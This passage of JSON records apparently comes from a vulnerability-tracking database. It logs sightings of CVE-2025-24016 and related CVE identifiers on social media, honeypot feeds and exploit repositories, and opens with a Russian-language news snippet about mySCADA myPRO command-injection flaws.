\u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u043b\u0443\u043c\u0438\u043b\u043b\u0438\u043e\u043d\u0430 \u0441\u0430\u0439\u0442\u043e\u0432 WordPress.\n\n7. \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 PRODAFT \u0440\u0430\u0441\u043a\u0440\u044b\u043b\u0438 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438\u00a0\u0434\u0432\u0443\u0445 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 mySCADA myPRO, \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u0434\u0438\u0441\u043f\u0435\u0442\u0447\u0435\u0440\u0441\u043a\u043e\u0433\u043e \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0438 \u0441\u0431\u043e\u0440\u0430 \u0434\u0430\u043d\u043d\u044b\u0445, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0443\u044e \u0432 \u0441\u0440\u0435\u0434\u0430\u0445 OT, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043d\u0430\u0434 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u043c\u0438 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c\u0438.\n\n\u041e\u0431\u0435 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0441\u0432\u044f\u0437\u0430\u043d\u044b \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u0435\u043c \u043a\u043e\u043c\u0430\u043d\u0434 \u041e\u0421, \u043e\u0446\u0435\u043d\u0438\u0432\u0430\u044e\u0442\u0441\u044f \u043d\u0430 9,3 \u043f\u043e CVSS v4 \u0438 \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u044e\u0442\u0441\u044f \u043a\u0430\u043a CVE-2025-20014 \u0438 CVE-2025-20061.\n\n\u0423\u0441\u043f\u0435\u0448\u043d\u0430\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u043b\u044e\u0431\u043e\u0439 \u0438\u0437 \u0434\u0432\u0443\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u0432\u043d\u0435\u0434\u0440\u0438\u0442\u044c \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434.\n\n\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u044b \u0432 mySCADA PRO \u041c\u0435\u043d\u0435\u0434\u0436\u0435\u0440 1.3 \u0438 mySCADA PRO Runtime 9.2.1.", "creation_timestamp": "2025-03-20T18:30:07.000000Z"}, {"uuid": "399ddabd-0e28-4a4e-b1c1-b675540345a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24011", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113867076129252776", "content": "", "creation_timestamp": "2025-01-21T15:34:56.277730Z"}, {"uuid": "93eb9fac-c7ef-4e55-b231-b43c6f43b953", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24012", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113867076144151551", "content": "", "creation_timestamp": "2025-01-21T15:34:56.657926Z"}, {"uuid": "a98e0357-281d-40d6-9fea-945205ee275d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24017", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113867102324757033", "content": "", "creation_timestamp": "2025-01-21T15:41:36.090249Z"}, {"uuid": "b1d69f66-72cf-41df-8c9a-0893acf6a287", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24014", "type": "seen", "source": "https://bsky.app/profile/hackingne.ws/post/3lgbasei3432p", "content": "", "creation_timestamp": "2025-01-21T16:15:49.548876Z"}, {"uuid": "d47584bb-ebc4-48fa-8ed3-5364a1895438", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24011", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lgbast3qep2s", "content": "", "creation_timestamp": "2025-01-21T16:16:04.741944Z"}, {"uuid": "beb5237a-5662-4416-a6f7-9833ebfa316b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24012", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lgbasvjpv52h", "content": "", "creation_timestamp": "2025-01-21T16:16:07.436267Z"}, {"uuid": "79166838-7df0-4a45-9cbc-e9d833fc4982", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24017", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lgbasxxn7u2j", "content": "", "creation_timestamp": "2025-01-21T16:16:09.847567Z"}, {"uuid": "b2f64269-25b0-427f-95d9-2b801d4a6101", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24017", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lgbcothpw22h", "content": "", "creation_timestamp": "2025-01-21T16:49:39.449324Z"}, {"uuid": "6e6d2480-9969-4ba7-b0ce-07140c6d67dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24012", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lgbcotll3o2g", "content": "", "creation_timestamp": "2025-01-21T16:49:40.090724Z"}, {"uuid": "124adf25-69ec-4d52-9608-da75549f3cde", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24011", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lgbcottbpb2k", "content": "", "creation_timestamp": "2025-01-21T16:49:41.345525Z"}, {"uuid": "5b0097fc-0c8e-489a-b265-758571a24ca8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24018", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113867449282015793", "content": "", "creation_timestamp": "2025-01-21T17:09:50.275761Z"}, {"uuid": "bea99deb-26d9-4e8b-94e9-783b84d033df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24018", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lgbe63jqja27", "content": "", "creation_timestamp": "2025-01-21T17:16:04.047360Z"}, {"uuid": "17fc80ab-99ed-4d63-bddc-ecd3466ab2ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24018", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lgbgv2s5yh2e", "content": "", "creation_timestamp": "2025-01-21T18:04:42.791134Z"}, {"uuid": "625218fe-0eeb-43cf-a5ac-bdce324b4cbd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24019", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lgbhk7mmfx2j", "content": "", "creation_timestamp": "2025-01-21T18:16:32.362285Z"}, {"uuid": "6957f4a1-fc65-4bdb-966c-57a70318c11c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24019", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lgbpthj6ah2r", "content": "", "creation_timestamp": "2025-01-21T20:44:58.531904Z"}, {"uuid": "ac55fa78-ad0b-4779-ada2-3a7895c900a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3liko4h2hek2y", "content": "", "creation_timestamp": "2025-02-19T20:58:27.698935Z"}, {"uuid": "ed472caf-6e6a-4750-96b6-60c59f0e9431", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-2401", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114177870665644076", "content": "", "creation_timestamp": "2025-03-17T12:54:04.612962Z"}, {"uuid": "c33f4628-ec0f-41f5-9ab3-ec37fa7aa66a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/dinosn.bsky.social/post/3lklj7riths22", "content": "", "creation_timestamp": "2025-03-17T15:53:59.286332Z"}, {"uuid": "995a6fb4-d18a-4eb5-a7c2-e2cb0b740a36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "exploited", "source": "https://github.com/MuhammadWaseem29/CVE-2025-24016", "content": "", "creation_timestamp": "2025-03-12T13:26:49.000000Z"}, {"uuid": "6748b0a2-6e3c-462b-813f-b696ee827e89", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/helpnetsecurity.com/post/3lraoqwinus2x", "content": "", "creation_timestamp": "2025-06-10T10:30:07.206170Z"}, {"uuid": "258f7249-04e1-489d-b698-97677ec1b717", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cve-2025-24016", "type": "seen", "source": "https://bsky.app/profile/jos1264.social.skynetcloud.site.ap.brid.gy/post/3lraq6ocab3v2", "content": "", "creation_timestamp": "2025-06-10T10:55:46.931982Z"}, {"uuid": "ebc69258-66cd-4ea5-83b9-3604aed7a901", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://infosec.exchange/users/jbhall56/statuses/114659028201561577", "content": "", "creation_timestamp": "2025-06-10T12:18:46.225077Z"}, {"uuid": "a08e5a16-5009-4667-98c5-6d4873bc068f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/hacker.at.thenote.app/post/3lredynbes22h", "content": "", "creation_timestamp": "2025-06-11T21:28:10.157914Z"}, {"uuid": "f247deed-195d-4080-8e04-831c0c9d40f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/jbhall56.bsky.social/post/3lrautktedc23", "content": "", "creation_timestamp": "2025-06-10T12:18:54.165753Z"}, {"uuid": "8ee36d6e-489c-46a2-9512-00ab08422ec8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lreeiximkk26", "content": "", "creation_timestamp": "2025-06-11T21:37:17.917335Z"}, {"uuid": "d5885580-6500-41bc-8659-d037e60c9b77", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/basefortify.bsky.social/post/3lrb2jzcnvc2j", "content": "", "creation_timestamp": "2025-06-10T14:00:59.377015Z"}, {"uuid": "14dfaee0-55ca-4978-bdab-a7def9f2a35a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/4190622", "content": "", "creation_timestamp": "2025-06-10T18:50:11.596925Z"}, {"uuid": "2c16ce07-f7f5-45ab-bfbc-10e4c904c77e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24014", "type": "seen", "source": "https://gist.github.com/jamincollins/eeeaa5b5a021f181d02cd557edf76515", "content": "", "creation_timestamp": "2025-07-09T21:28:20.000000Z"}, {"uuid": "d26445ac-5d06-46c3-86c9-3330002c03b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/kitafox.bsky.social/post/3lrc7ipni4a2c", "content": "", "creation_timestamp": "2025-06-11T01:02:20.165815Z"}, {"uuid": "6138c9da-eaf5-453c-8614-426078daba1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3lrcduz5r6a2r", "content": "", "creation_timestamp": "2025-06-11T02:20:47.496731Z"}, {"uuid": "cfb28d38-03e5-47ac-9d27-10e929153318", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-06-16)", "content": "", "creation_timestamp": "2025-06-16T00:00:00.000000Z"}, {"uuid": "a7f2c0d3-4f90-4bed-aa86-3d872906af61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/hacker.at.thenote.app/post/3lrcrv4iepc2h", "content": "", "creation_timestamp": "2025-06-11T06:31:23.491430Z"}, {"uuid": "7e985fe5-51cc-4fb9-969d-aeb3fab718bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/hacker.at.thenote.app/post/3lrcshhfqmc2h", "content": "", "creation_timestamp": "2025-06-11T06:41:39.280565Z"}, {"uuid": "5212ce93-bdca-4f1c-b9af-8a677955ee74", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3lr6nbcv7qc62", "content": "", "creation_timestamp": "2025-06-09T15:00:08.999584Z"}, {"uuid": "1f95786a-0526-4601-8d6c-04555898ae8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://thehackernews.com/2025/06/botnet-wazuh-server-vulnerability.html", "content": "", "creation_timestamp": "2025-06-09T12:46:00.000000Z"}, {"uuid": "7d6f7fc5-8e38-48b1-bdfa-5fd7738807b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24015", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3lqtazbx3dj2r", "content": "", "creation_timestamp": "2025-06-05T02:19:33.850016Z"}, {"uuid": "6cb295a9-70fa-4480-aeaf-bb6fccd7e983", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-07)", "content": "", "creation_timestamp": "2025-05-07T00:00:00.000000Z"}, {"uuid": "9fdb3e10-daf8-40fb-b1a3-629d6d670ab6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://infosec.exchange/users/tomcat/statuses/114664791238342001", "content": "", "creation_timestamp": "2025-06-11T12:44:22.842035Z"}, {"uuid": "05e5f2a0-9f96-4b7f-8945-02372bf9bc58", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "cve-2025-24016", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114862970371156766", "content": "", "creation_timestamp": "2025-07-16T12:43:56.809351Z"}, {"uuid": "8923eafa-2541-4ca5-8553-4a20975ee904", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-08)", "content": "", "creation_timestamp": "2025-05-08T00:00:00.000000Z"}, {"uuid": "8805c37f-7987-4b01-96ed-5f6485c75384", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-06-18)", "content": "", "creation_timestamp": "2025-06-18T00:00:00.000000Z"}, {"uuid": "4e99d35a-a5cd-438d-88f2-59708c3a38ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-08)", "content": "", "creation_timestamp": "2025-05-08T00:00:00.000000Z"}, {"uuid": "cdf6f560-6048-46ef-b2fc-ad370bd490ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/campuscodi.risky.biz/post/3lr7o5ja7gk2t", "content": "", "creation_timestamp": "2025-06-10T00:46:30.749912Z"}, {"uuid": "0a24f29b-5077-41d8-88a8-9ec1a2b537f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/leekthehack.bsky.social/post/3lrdq6o3dqc2e", "content": "", "creation_timestamp": "2025-06-11T15:33:42.951604Z"}, {"uuid": "b5348a58-3b06-4037-b59e-b1b07d89bac4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/leekthehack.bsky.social/post/3lrdq6rqpls2e", "content": "", "creation_timestamp": "2025-06-11T15:33:43.588213Z"}, {"uuid": "ef288ce0-e9ee-48f5-8d58-298a5dadc0ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/nihonmatsu.bsky.social/post/3lra4li2dwc2a", "content": "", "creation_timestamp": "2025-06-10T05:04:52.155596Z"}, {"uuid": "d35a5b4e-ba12-4f72-b504-f94073eff6dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lrjgh77egk2g", "content": "", "creation_timestamp": "2025-06-13T21:55:29.956076Z"}, {"uuid": "a8c48ced-504e-45dd-8c6e-a9035567762d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/cyberresearch.bsky.social/post/3ltr4egvsrh24", "content": "", "creation_timestamp": "2025-07-12T10:06:34.854880Z"}, {"uuid": "7cb32ebf-6663-46f5-b2bb-74900df76016", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "MISP/a9d21043-f825-4bac-8d2b-56fb9e8343e7", "content": "", "creation_timestamp": "2025-10-23T21:13:04.000000Z"}, {"uuid": "4490092d-381d-43b1-94f7-1ea8aab87411", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-09-28T08:23:31.000000Z"}, {"uuid": "dfefc389-9b86-40ad-b277-5b5eef368065", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://gist.github.com/alon710/e20ebfb9f770e0a0b0142546c91edb5e", "content": "", "creation_timestamp": "2026-01-24T22:34:18.000000Z"}, {"uuid": "05ffeb8a-421f-4d06-afc1-7ee8a78332b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://gist.github.com/alon710/448b0b00a78a311665a4c7ed4a14beb0", "content": "", "creation_timestamp": "2026-01-24T22:34:15.000000Z"}, {"uuid": "ff50b845-395d-4233-bab2-d4e739514d1e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3lrjv4h54s72s", "content": "", "creation_timestamp": "2025-06-14T02:17:49.002261Z"}, {"uuid": "3ee87655-c5cc-442e-8036-81a64e00648d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/shiojiri.com/post/3lrcsoxh3ds2a", "content": "", "creation_timestamp": "2025-06-11T06:45:56.648696Z"}, {"uuid": "8845a86c-8a71-4a31-8bc9-cb2d5917d6fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-04)", "content": "", "creation_timestamp": "2025-05-04T00:00:00.000000Z"}, {"uuid": "d662c34a-3547-4926-923d-c62537621d8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3lohbckpx5w2q", "content": "", "creation_timestamp": "2025-05-05T21:02:25.305827Z"}, {"uuid": "4fddba2f-43ff-4839-84d1-a42466c90a18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-05-06)", "content": "", "creation_timestamp": "2025-05-06T00:00:00.000000Z"}, {"uuid": "fa2e6ae7-35eb-4586-bebb-fc3f93de2102", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-05-06)", "content": "", "creation_timestamp": "2025-05-06T00:00:00.000000Z"}, {"uuid": "2f70f152-73ec-4722-bc5b-10f833a900e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3lpmyc6ffdo2u", "content": "", "creation_timestamp": "2025-05-20T21:02:22.013716Z"}, {"uuid": "c67f2400-d235-4d53-99a2-ffdcd3644f1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3lrowdtbahs2w", "content": "", "creation_timestamp": "2025-06-16T02:23:08.999207Z"}, {"uuid": "29eb5473-7b92-433c-90bb-5765061853cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-22)", "content": "", "creation_timestamp": "2025-08-22T00:00:00.000000Z"}, {"uuid": "093c3424-3ea0-4fa3-a8ec-efeac5575d81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/wazuh_auth_rce_cve_2025_24016.rb", "content": "", "creation_timestamp": "2025-08-12T16:30:43.000000Z"}, {"uuid": "03620d9d-6c42-424b-812b-f0d0166cf063", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/573ac1af-09ee-407c-8c57-49f646908b21", "content": "", "creation_timestamp": "2026-02-02T12:25:59.085733Z"}, {"uuid": "7a633df7-81ef-4009-924a-a412dc5f7428", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/14549", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 